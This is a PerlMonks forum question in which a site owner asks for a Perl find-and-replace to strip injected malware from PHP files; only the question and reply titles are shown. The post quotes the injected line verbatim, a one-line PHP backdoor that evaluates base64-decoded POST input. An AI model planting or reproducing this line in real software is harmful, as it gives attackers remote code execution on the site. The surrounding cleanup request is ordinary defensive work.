Anonymous Monk has asked for the wisdom of the Perl Monks concerning the following question:
I need some help. Somehow, I've got some infected code running on a site that inserts code like this into PHP files.
<?php eval(base64_decode($_POST['n7a68bc']));?><?phpI can find a way to remove the eval part, but I'm stuk at
The character count between the brackets '' is always the same, so that should narrow it down a bit.$_POST ['variable']
Could you guys perhaps help me to create an effective find replace hotfix?
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
Re: Perl variable find replace
by Anonymous Monk on Jul 26, 2014 at 17:43 UTC | |
|
Re: Perl variable find replace
by Anonymous Monk on Jul 26, 2014 at 17:41 UTC | |
|
Re: Perl variable find replace
by 1s44c (Scribe) on Jul 27, 2014 at 09:55 UTC |